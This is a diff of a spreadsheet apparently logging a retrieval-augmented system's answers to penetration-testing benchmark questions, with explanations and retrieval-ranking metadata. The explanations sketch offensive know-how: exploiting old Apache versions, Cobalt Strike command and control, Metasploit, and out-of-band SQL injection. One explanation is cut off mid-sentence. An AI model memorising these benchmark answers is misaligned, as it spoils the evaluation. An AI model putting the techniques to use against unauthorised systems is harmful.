 preemware_pentestingeval.pdf (Chunk: 08b874c5-403c-40bb-98c9-b933ea5735a6, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: d817eb18-44c3-4ea1-a392-7c74b36c3a26, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 211c6f97-6412-428f-9b6c-66975c93fba1, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: d817eb18-44c3-4ea1-a392-7c74b36c3a26, Type: sparse, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: 211c6f97-6412-428f-9b6c-66975c93fba1, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I208" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 7, Keyword: 3, Total: 10</t>
         </is>
       </c>
       <c r="J208" t="n">
@@ -14453,7 +14431,7 @@
       </c>
       <c r="K208" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -14520,7 +14498,7 @@
       </c>
       <c r="K209" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -14555,7 +14533,7 @@
       <c r="F210" t="inlineStr">
         <is>
           <t>Answer: Exploiting known vulnerabilities in outdated server software versions
-Explanation: The key aspect of effective penetration testing is to exploit the weakest link in a system's security. In this scenario, the target system runs an outdated version of the Apache web server. Historical data and security reports such as those from CVE (Common Vulnerabilities and Exposures) detail numerous vulnerabilities in specific old versions of Apache, such as remote code execution and privilege escalation, which can be exploited. With the server running version 2.2.31, specific exploits targeted to this version can be leveraged heavily to gain unauthorized access or escalate privileges. Distractors like SQL Injection or brute-force attacks, while valid techniques, do not specifically cater to the discovered weakness (i.e., the outdated server version) and might require more time and resources to succeed. Analyzing the application's resistance to traffic flooding (denial of service) also may be valid but isn't directly exploiting the known vulnerability of the old Apache version, making it a less direct approach for penetration.</t>
+Explanation: The key aspect of effective penetration testing is to exploit the weakest link in a system's security. In this scenario, the target system runs an outdated version of the Apache web server. Historical data and security reports such as those from CVE (Common Vulnerabilities and Exposures) detail numerous vulnerabilities in specific old versions of Apache, such as remote code execution and privilege escalation, which can be exploited. With the server running version 2.2.31, specific exploits targeted to this version can be leveraged heavily to gain unauthorized access or escalate privileges. Distractors like analyzing denial of service vulnerability through traffic flooding, carrying out a SQL Injection attack, and conducting a brute-force attack do not specifically cater to the discovered weakness (i.e., the outdated server version) and might require more time and resources to succeed. Analyzing the application's resistance to traffic flooding also may be valid but isn't directly exploiting the known vulnerability of the old Apache version, making it a less direct approach for penetration.</t>
         </is>
       </c>
       <c r="G210" t="inlineStr">
@@ -14568,18 +14546,18 @@
           <t>preemware_pentestingeval.pdf (Chunk: 3cab02c9-e3d9-4f69-b30b-cf3644f3e1c0, Type: dense, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: 9aa0bfc8-f4fe-4359-bbb9-8ebb0378d387, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 9a3c4886-d3fe-4dee-babc-d721f119b21b, Type: dense, Rank: 3)
-preemware_pentestingeval.pdf (Chunk: aebf1bc1-657b-4a4c-836d-12a9f04a6ccb, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 83d0221c-27bf-48bf-bd78-86ad35de122e, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 3d55cf32-7fea-4fec-a92c-cade6640d08d, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: b71718d2-8bfb-4126-9a9d-483a7b3fb627, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 15baa0d1-21f6-46e4-85b4-3ffb3cb51be3, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: f7e2fa45-f6cc-4891-874c-6a9fc73e7701, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 83d0221c-27bf-48bf-bd78-86ad35de122e, Type: dense, Rank: 4)
+preemware_pentestingeval.pdf (Chunk: 3d55cf32-7fea-4fec-a92c-cade6640d08d, Type: sparse, Rank: 5)
+preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: dense, Rank: 6)
+preemware_pentestingeval.pdf (Chunk: b71718d2-8bfb-4126-9a9d-483a7b3fb627, Type: sparse, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: 15baa0d1-21f6-46e4-85b4-3ffb3cb51be3, Type: sparse, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: f7e2fa45-f6cc-4891-874c-6a9fc73e7701, Type: dense, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: e710af68-282f-416e-9fa7-53199146dfe2, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I210" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 7, Keyword: 3, Total: 10</t>
         </is>
       </c>
       <c r="J210" t="n">
@@ -14587,7 +14565,7 @@
       </c>
       <c r="K210" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -14622,7 +14600,7 @@
       <c r="F211" t="inlineStr">
         <is>
           <t>Answer: Cobalt Strike
-Explanation: Cobalt Strike is a powerful post-exploitation framework that allows experienced attackers to maintain long-term access and provide comprehensive command and control capabilities. It includes features like beaconing, which enables stealthy communication with compromised hosts, and a suite of tools for network reconnaissance, lateral movement, and data exfiltration. While 'Meterpreter' and 'Pupy' also have post-exploitation capabilities, Cobalt Strike is specifically designed to facilitate long-term access and provide comprehensive control in red team operations.</t>
+Explanation: Cobalt Strike is a powerful post-exploitation framework that facilitates long-term access and provides comprehensive command and control capabilities. It includes features like beaconing capabilities, which allow stealthy communication with compromised hosts, and a suite of tools for network reconnaissance, lateral movement, and data exfiltration. While Meterpreter and Pupy are also post-exploitation frameworks, they are not as comprehensive or feature-rich as Cobalt Strike. Empire is another option but it's more focused on providing a scriptable command and control framework rather than the full suite of features provided by Cobalt Strike.</t>
         </is>
       </c>
       <c r="G211" t="inlineStr">
@@ -14633,20 +14611,20 @@
       <c r="H211" t="inlineStr">
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: 140bf297-3b8f-4cda-8b62-a97281432e55, Type: dense, Rank: 1)
-preemware_pentestingeval.pdf (Chunk: 5f4ba9c9-4739-4151-9e88-342275d06efc, Type: dense, Rank: 2)
-preemware_pentestingeval.pdf (Chunk: b71718d2-8bfb-4126-9a9d-483a7b3fb627, Type: dense, Rank: 3)
-preemware_pentestingeval.pdf (Chunk: ac23a721-e803-4c69-b27a-a7067798ea01, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 60ebd270-998c-47f2-98a3-628070e318cb, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: e710af68-282f-416e-9fa7-53199146dfe2, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 83d0221c-27bf-48bf-bd78-86ad35de122e, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 0e3b5bb4-eb06-4257-ab62-97c3f78afa53, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 33faa168-7953-48fd-a109-3efbdaec8d52, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: b71718d2-8bfb-4126-9a9d-483a7b3fb627, Type: dense, Rank: 2)
+preemware_pentestingeval.pdf (Chunk: ac23a721-e803-4c69-b27a-a7067798ea01, Type: dense, Rank: 3)
+preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: dense, Rank: 4)
+preemware_pentestingeval.pdf (Chunk: e710af68-282f-416e-9fa7-53199146dfe2, Type: dense, Rank: 5)
+preemware_pentestingeval.pdf (Chunk: 83d0221c-27bf-48bf-bd78-86ad35de122e, Type: dense, Rank: 6)
+preemware_pentestingeval.pdf (Chunk: 0e3b5bb4-eb06-4257-ab62-97c3f78afa53, Type: sparse, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: 33faa168-7953-48fd-a109-3efbdaec8d52, Type: dense, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: afdc7c73-427b-4da6-8482-3f723c306b99, Type: dense, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: 9aa0bfc8-f4fe-4359-bbb9-8ebb0378d387, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I211" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 8, Keyword: 2, Total: 10</t>
         </is>
       </c>
       <c r="J211" t="n">
@@ -14654,7 +14632,7 @@
       </c>
       <c r="K211" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -14703,17 +14681,17 @@
 preemware_pentestingeval.pdf (Chunk: 98a0a4b0-83b8-4181-ac2e-6cdf5bbb1ea1, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 211c6f97-6412-428f-9b6c-66975c93fba1, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 858a83cd-a7f8-40d5-b144-5389618e38f9, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: a70f6200-1dd0-4d5f-8b64-aa88d40f5e5e, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: ca893e36-a461-4463-8cb1-5a118bc61c7f, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 3cab02c9-e3d9-4f69-b30b-cf3644f3e1c0, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 907956f7-9612-4247-81ec-4ad665e45276, Type: dense, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: a70f6200-1dd0-4d5f-8b64-aa88d40f5e5e, Type: sparse, Rank: 5)
+preemware_pentestingeval.pdf (Chunk: ca893e36-a461-4463-8cb1-5a118bc61c7f, Type: sparse, Rank: 6)
+preemware_pentestingeval.pdf (Chunk: 3cab02c9-e3d9-4f69-b30b-cf3644f3e1c0, Type: sparse, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: 907956f7-9612-4247-81ec-4ad665e45276, Type: sparse, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: 86786a50-15b5-4c14-be3b-c67e3d167f6c, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: d6ee2010-4521-4fdb-bc8d-5103053d4db5, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: d6ee2010-4521-4fdb-bc8d-5103053d4db5, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I212" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 5, Keyword: 5, Total: 10</t>
         </is>
       </c>
       <c r="J212" t="n">
@@ -14721,7 +14699,7 @@
       </c>
       <c r="K212" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -14769,18 +14747,18 @@
           <t>preemware_pentestingeval.pdf (Chunk: 958d7f7e-d213-4f52-a3d0-8804b4d8db4e, Type: dense, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: b09ec26e-5654-4c4b-bb3a-f02c97266fbc, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: fe3d25bc-d8ae-4c4b-a1a9-0cddb566beef, Type: dense, Rank: 3)
-preemware_pentestingeval.pdf (Chunk: 73ad948f-984e-4fd2-b5af-5e206fd07d65, Type: dense, Rank: 4)
+preemware_pentestingeval.pdf (Chunk: 73ad948f-984e-4fd2-b5af-5e206fd07d65, Type: sparse, Rank: 4)
 cowWhySo-pentest-redteam-steering.md (Chunk: 924a5cff-3664-4ddd-8d4f-df8b9ec7e730, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 7b617c4a-1b3b-4481-8bf5-6d0fe80f1b8e, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 0b22159c-ee6c-41f9-88d2-29f41ea39375, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 6ceef267-c6fd-4e8f-b4a3-39d3243f8460, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: fca5c541-a4a4-43b8-8b26-388e9cea155b, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 9eff9f90-a6af-4772-be1c-2b9c8e1903fc, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 0b22159c-ee6c-41f9-88d2-29f41ea39375, Type: sparse, Rank: 6)
+preemware_pentestingeval.pdf (Chunk: 6ceef267-c6fd-4e8f-b4a3-39d3243f8460, Type: sparse, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: fca5c541-a4a4-43b8-8b26-388e9cea155b, Type: sparse, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: 9eff9f90-a6af-4772-be1c-2b9c8e1903fc, Type: dense, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: 446c016e-ab1a-45cc-bba8-04d6c3f76454, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I213" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 5, Keyword: 5, Total: 10</t>
         </is>
       </c>
       <c r="J213" t="n">
@@ -14788,7 +14766,7 @@
       </c>
       <c r="K213" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -14823,7 +14801,7 @@
       <c r="F214" t="inlineStr">
         <is>
           <t>Answer: Metasploit's msfconsole
-Explanation: Metasploit's msfconsole is specifically designed for automating the exploitation of known vulnerabilities in remote servers and applications. It provides a comprehensive framework that includes payloads, encoders, and exploit modules which can be used to efficiently target and test the security of remote systems. On the other hand, Wireshark is primarily used for network protocol analysis, making it not directly related to the subtlety required for maintaining long-term persistence, and DLL injections can often be detected by advanced endpoint protection systems.</t>
+Explanation: Metasploit's msfconsole is specifically designed for automating the exploitation of known vulnerabilities in remote servers and applications. It provides a comprehensive framework that includes payloads, encoders, and exploit modules which can be used to efficiently target and test the security of remote systems. On the other hand, Wireshark's protocol analyzer is primarily used for network protocol analysis, making it not directly related to the subtlety required for maintaining long-term persistence, and John the Ripper password cracker is a tool for brute force or dictionary attacks on weak passwords, while Burp Suite's proxy tool is predominantly utilized for web application security testing.</t>
         </is>
       </c>
       <c r="G214" t="inlineStr">
@@ -14833,21 +14811,21 @@
       </c>
       <c r="H214" t="inlineStr">
         <is>
-          <t>preemware_pentestingeval.pdf (Chunk: fd0fe897-462c-4c72-9fee-81b32fc6d466, Type: dense, Rank: 1)
-preemware_pentestingeval.pdf (Chunk: ac23a721-e803-4c69-b27a-a7067798ea01, Type: dense, Rank: 2)
-preemware_pentestingeval.pdf (Chunk: 1788a271-9788-4fa2-a1ab-d1d7f02f5ced, Type: dense, Rank: 3)
+          <t>preemware_pentestingeval.pdf (Chunk: fd0fe897-462c-4c72-9fee-81b32fc6d466, Type: sparse, Rank: 1)
+preemware_pentestingeval.pdf (Chunk: ac23a721-e803-4c69-b27a-a7067798ea01, Type: sparse, Rank: 2)
+preemware_pentestingeval.pdf (Chunk: 1788a271-9788-4fa2-a1ab-d1d7f02f5ced, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: c8091472-5f13-4fd4-b42f-775d8b5720af, Type: dense, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: f7e2fa45-f6cc-4891-874c-6a9fc73e7701, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 94a5825c-3c24-4426-98b6-0f15dd480b28, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: c722d3b3-3a6b-4c5c-ab92-a795ce66e638, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 48095558-19bb-4a42-9c2f-c85be495918f, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 1d9c2c29-6258-4807-8e78-b88b13c24f33, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 3cab02c9-e3d9-4f69-b30b-cf3644f3e1c0, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: c722d3b3-3a6b-4c5c-ab92-a795ce66e638, Type: sparse, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: 1d9c2c29-6258-4807-8e78-b88b13c24f33, Type: dense, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: 3cab02c9-e3d9-4f69-b30b-cf3644f3e1c0, Type: sparse, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: f31cfefc-9fab-4a23-aa84-53a64623ddac, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I214" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 4, Keyword: 6, Total: 10</t>
         </is>
       </c>
       <c r="J214" t="n">
@@ -14855,7 +14833,7 @@
       </c>
       <c r="K214" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -14901,20 +14879,20 @@
       <c r="H215" t="inlineStr">
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: da05222e-12f4-464d-a4cf-e755c02cdecf, Type: dense, Rank: 1)
-preemware_pentestingeval.pdf (Chunk: 5bc0c5a7-4292-4658-a0ec-676d6c743ab8, Type: dense, Rank: 2)
+preemware_pentestingeval.pdf (Chunk: 5bc0c5a7-4292-4658-a0ec-676d6c743ab8, Type: sparse, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: d6ee2010-4521-4fdb-bc8d-5103053d4db5, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: b28d496d-a5a2-41f1-a542-c1345b6b7e18, Type: dense, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: 83612a00-ff68-4885-bd22-958afc16e77e, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 98a0a4b0-83b8-4181-ac2e-6cdf5bbb1ea1, Type: dense, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: b09ec26e-5654-4c4b-bb3a-f02c97266fbc, Type: dense, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: d81db727-e5e2-44eb-8aa1-20ab3f8883a1, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: ca893e36-a461-4463-8cb1-5a118bc61c7f, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: b96549cf-2f25-40ce-8da2-f5c771be36cd, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: ca893e36-a461-4463-8cb1-5a118bc61c7f, Type: sparse, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: b96549cf-2f25-40ce-8da2-f5c771be36cd, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I215" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 7, Keyword: 3, Total: 10</t>
         </is>
       </c>
       <c r="J215" t="n">
@@ -14922,7 +14900,7 @@
       </c>
       <c r="K215" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -14967,21 +14945,21 @@
       </c>
       <c r="H216" t="inlineStr">
         <is>
-          <t>preemware_pentestingeval.pdf (Chunk: 83612a00-ff68-4885-bd22-958afc16e77e, Type: dense, Rank: 1)
+          <t>preemware_pentestingeval.pdf (Chunk: 83612a00-ff68-4885-bd22-958afc16e77e, Type: sparse, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: e14e7566-1002-4675-b5db-65eecaad633c, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 265048aa-c862-4da6-ab9b-ec68423cfe22, Type: dense, Rank: 3)
-preemware_pentestingeval.pdf (Chunk: 33faa168-7953-48fd-a109-3efbdaec8d52, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: c54f468f-1388-41a7-b8ef-35e5cc3eac90, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: c66b81fc-63d9-4a97-b0ee-e81484cd308f, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 211c6f97-6412-428f-9b6c-66975c93fba1, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: c8526d10-31df-4fac-9a82-6d9008822382, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: e32f0786-db66-459f-9257-ca7a63518524, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 858a83cd-a7f8-40d5-b144-5389618e38f9, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 33faa168-7953-48fd-a109-3efbdaec8d52, Type: sparse, Rank: 4)
+preemware_pentestingeval.pdf (Chunk: c54f468f-1388-41a7-b8ef-35e5cc3eac90, Type: sparse, Rank: 5)
+preemware_pentestingeval.pdf (Chunk: c66b81fc-63d9-4a97-b0ee-e81484cd308f, Type: sparse, Rank: 6)
+preemware_pentestingeval.pdf (Chunk: 211c6f97-6412-428f-9b6c-66975c93fba1, Type: sparse, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: c8526d10-31df-4fac-9a82-6d9008822382, Type: sparse, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: e32f0786-db66-459f-9257-ca7a63518524, Type: sparse, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: 858a83cd-a7f8-40d5-b144-5389618e38f9, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I216" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 2, Keyword: 8, Total: 10</t>
         </is>
       </c>
       <c r="J216" t="n">
@@ -14989,7 +14967,7 @@
       </c>
       <c r="K216" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -15038,17 +15016,17 @@
 preemware_pentestingeval.pdf (Chunk: 08b874c5-403c-40bb-98c9-b933ea5735a6, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: d97e1711-53ab-44ca-af62-a56a0d80cec8, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: bde046e7-1e88-444d-8a5d-09f26bea8c82, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 211c6f97-6412-428f-9b6c-66975c93fba1, Type: dense, Rank: 5)
+preemware_pentestingeval.pdf (Chunk: 211c6f97-6412-428f-9b6c-66975c93fba1, Type: sparse, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 907956f7-9612-4247-81ec-4ad665e45276, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: d817eb18-44c3-4ea1-a392-7c74b36c3a26, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 3cab02c9-e3d9-4f69-b30b-cf3644f3e1c0, Type: dense, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: d817eb18-44c3-4ea1-a392-7c74b36c3a26, Type: sparse, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: 3cab02c9-e3d9-4f69-b30b-cf3644f3e1c0, Type: sparse, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: 8d1f7c98-1820-4eb2-ad4a-d781b911d08a, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 8b80403b-5bc0-4b8e-8246-dc7a15db7a9f, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 8b80403b-5bc0-4b8e-8246-dc7a15db7a9f, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I217" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 6, Keyword: 4, Total: 10</t>
         </is>
       </c>
       <c r="J217" t="n">
@@ -15056,7 +15034,7 @@
       </c>
       <c r="K217" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -15103,19 +15081,19 @@
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: c54f468f-1388-41a7-b8ef-35e5cc3eac90, Type: dense, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: 53d92d7b-c5d1-4bbd-bdf4-b29c029a1b9e, Type: dense, Rank: 2)
-preemware_pentestingeval.pdf (Chunk: afdc7c73-427b-4da6-8482-3f723c306b99, Type: dense, Rank: 3)
+preemware_pentestingeval.pdf (Chunk: afdc7c73-427b-4da6-8482-3f723c306b99, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 73d10db3-dede-40c2-a481-2183afa5e843, Type: dense, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: 15baa0d1-21f6-46e4-85b4-3ffb3cb51be3, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 265048aa-c862-4da6-ab9b-ec68423cfe22, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 3cab02c9-e3d9-4f69-b30b-cf3644f3e1c0, Type: dense, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: 3cab02c9-e3d9-4f69-b30b-cf3644f3e1c0, Type: sparse, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: a151d480-e4c6-4b63-94f3-d8e0fb70dff8, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 0e3b5bb4-eb06-4257-ab62-97c3f78afa53, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: sparse, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: 0e3b5bb4-eb06-4257-ab62-97c3f78afa53, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I218" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 6, Keyword: 4, Total: 10</t>
         </is>
       </c>
       <c r="J218" t="n">
@@ -15123,7 +15101,7 @@
       </c>
       <c r="K218" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -15158,7 +15136,7 @@
       <c r="F219" t="inlineStr">
         <is>
           <t>Answer: Using an Out of Band (OOB) technique to test SQL injection vulnerabilities
-Explanation: The acceptable practice among the choices for ethical penetration testing is using an Out of Band (OOB) technique to test SQL injection vulnerabilities. This advanced technique involves causing the server to make a connection back to the attacker's server. It is used to confirm and exploit SQL injection flaws while carefully avoiding disruption of the application's normal operations. This method has the advantage of proving the vulnerability without inserting malicious data into the database. In contrast, deploying ransomware on a production environment would be unethical and disruptive, conducting brute-force attacks on external facing login portals during peak hours could lead to denial of service, and analyzing traffic with Wireshark in promiscuous mode without permission is generally considered an invasion of privacy.</t>
+Explanation: The acceptable practice among the choices for ethical penetration testing is using an Out of Band (OOB) technique to test SQL injection vulnerabilities. This advanced technique involves causing the server to make a connection back to the attacker's server. It is used to confirm and exploit SQL injection flaws while carefully avoiding disruption of the application's normal operations. This method has the advantage of proving the vulnerability without inserting malicious data into the database. In contrast, deploying</t>
         </is>
       </c>
       <c r="G219" t="inlineStr">
@@ -15170,19 +15148,19 @@
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: b46c35c5-2d28-451d-b837-85c2e32ea452, Type: dense, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: f763cdb5-6965-4d89-8a52-efa5fe071b81, Type: dense, Rank: 2)
-preemware_pentestingeval.pdf (Chunk: 6fe9074d-23ef-4574-890d-8b4b12031dc1, Type: dense, Rank: 3)
-preemware_pentestingeval.pdf (Chunk: fe2d631f-fdd5-45c1-9060-0105f0235b78, Type: dense, Rank: 4)
+preemware_pentestingeval.pdf (Chunk: 6fe9074d-23ef-4574-890d-8b4b12031dc1, Type: sparse, Rank: 3)
+preemware_pentestingeval.pdf (Chunk: fe2d631f-fdd5-45c1-9060-0105f0235b78, Type: sparse, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: d1fe78d6-7581-4091-933f-4f2f7f15150f, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: dfa3f47d-5ca2-4a60-aa5e-cd08e2caa4b2, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: da05222e-12f4-464d-a4cf-e755c02cdecf, Type: dense, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: da05222e-12f4-464d-a4cf-e755c02cdecf, Type: sparse, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: d175cfd5-e779-4122-ad9c-10aeb562c1b8, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: e189877f-2ed8-49a5-ae4b-00bb7694f847, Type: dense, Rank: 9)
